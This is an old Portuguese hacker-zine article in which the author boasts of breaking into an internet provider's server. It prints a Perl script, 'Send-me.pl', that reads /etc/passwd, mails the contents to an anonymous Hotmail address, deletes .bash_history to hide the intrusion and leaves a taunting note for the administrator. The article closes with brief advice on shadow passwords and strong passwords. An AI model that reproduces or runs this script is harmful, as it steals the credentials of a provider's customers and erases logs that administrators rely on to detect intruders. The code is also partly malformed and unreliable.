Getting Passwd
Death Knights Issue 0
by `SkyDiver`
Frequento uma rede de IRC e meu nickname (apelidio) e `SkyDiver`, como o nickname mesmo diz gosto de voar, viajar pela rede mundial de computadores (Internet), sou um dos integrantes do grupo que tem como responsavel o Cacaio, tenho 17 anos, minha experiencia com rede Internet e de aproximadamente 2 anos, mas afirmo que foram proveitosos, tenho conhecimentos de alguma linguagens de programacao que me auxiliam, como: C++, Delphi, Java Script, HTML, Perl e CGI. Relato nesta entrevista como fiz para pegar as senhas de um provedor de acesso a Internet passando apenas 5 segundos logado (conectado) a maquina remota.
Usei uma estrategia um pouco diferente para poder hackear as senhas. Primeiramente conectei com uma conta criada em um provedor que oferece um servico de cadastro on-line atraves de nvmeros de cartao de credito e libera o acesso ao preencher os dados, mesmo preenchendo errado [nao precisa dizer que e a Elogica]:). Ao me despistar do rastreador de hackers, comecei com a diversao. Dei um telnet para o meu alvo (servidor da noite como gosto de chamar). Ao logar com uma conta Shell que consegui com a ajuda de uns dos integrantes do grupo o SaTaNfAcE.
Eu poderia ter pego as senhas executando os comando manualmente no prompt do servidor, mas preferi gastar mais tempo fazendo um script na linguagem de programacao Perl, para que realizasse a minha tarefa e meu tempo logado no servidor fosse curto assim evitando que algum administrador que possivelmente estivesse logado, poderia me detectar e dar um Kill (matar) no meu processo e possivelmente remover a conta que estava usando no momento ou tomado precaucoes onde eu nao poderia fazer mais nada no momento. Esse script que sito abaixo o seu codigo fonte, envia o conteudo do arquivo de senhas(geralmente passwd, quando o servidor nao tem o shadow instalado) para minha caixa anonima de e-mail criada em um servidor de e-mails anonimos conhecido pelas pessoas que gostam de ter um endereco de mail sem se identificar, e deixando uma mensagem para o "administrador" do servidor invadido, nao teria graca se eu pegasse a senha root(super usuario) e removesse tudo do sistema, o cadastro de clientes ou mesmo mudar as senhas de todos os clientes, preferi ao inves disso apenas deixar uma mensagem para o SysAdm(Administrador de sistema).
Antes de tudo tive que adaptar o meu programa com as configuracoes do servidor a ser hackeado ou seja especificando onde estava o interpretador da linguagem Perl, para que meu script fosse executado com sucesso. Para saber onde realmente estava o compilador apenas usei o comando 'whereis' do Unix, entao ele me retornou o cominho onde se encontrava o interpretador, que esta especificada na primeira linha do programa. Apesar de ser um programa simples realiza as minhas terefas com precisao.
Nome do script: Send-me.pl
#Indico ao sistema em que interpretador este script irar usar
#para ser executado
#!/usr/bin/perl
#Abrindo a variavel onde recebera as linhas de comando a serem executadas
open(PASS, "|
#Transferindo o cente˙do dos arquivos de senhas para o arquivo (pass.now)
#criado pelo script.
cat /etc/passwd > pass.now;
#Enviando o arquivo gerado para o meu mail anonimo (conta de
#mail gerada no Hot Mail)
mail mail\@hotmail.com < pass.now;
#Removendo o arquivo criado (pass.now)
rm -f pass.now;
#Removendo o log (toda terefa que realizei durante o logon no
#servidor) salvado no arquivo '.bash_history'
rm -f .bash_history;
#Finalizando o processo
");
# Fechando a variavel "PASS"
close(PASS);
#-=-=-=-=-=-=-=-=-=-=-=-=-
#Inicializando o processo para criar o log deixando uma
#mensagem para o administrador
#Iniciando a variavel
open (LOG, "
#Salvando o conteudo passado para a variavel 'LOG'em
# '.bash_history' deixando a mensagem...
>>.bash_history");
#Adicionando o texto a variavel 'LOG'
print LOG "Ao ler este log, ja sera' tarde demais...\n The Death Knights";
#Finalizando o processo de LOG
close(LOG);Isso tudo so foi permitido ocorrer por ter usado uma conta shell que me da permissao para executar scripts no meu home (diretorio onde o dono da shell pode criar e executar tarefas). A senha era 'senha97' onde isso e um erro grave tanto dono da Shell quanto o SysAdm.
Erro do dono da conta shell foi cometida quando ele colocou uma senha ingenua como esta, e o do SysAdm foi deixar permissao para que o diretorio 'etc' (o diretorio onde fica os arquivos de senhas e configuracoes do servidor) liberada para as contas mesmo sendo Shell, tambem isso poderia ser evitado ao instalar o shadow (um arquivo onde as senhas ficam com mais seguranca) . e aconselhavel colocar uma senha que tenha caracteres maiusculos e minusculos assim incluindo numeros e caracteres especiais como : @, #, $, %, ^^, *, =, e outros.
Exemplo de uma senha: 'M&uNom&80', onde estou dificultando e colocando a minha senha facil de lembrar, com meu nome e o ano em que nasci.
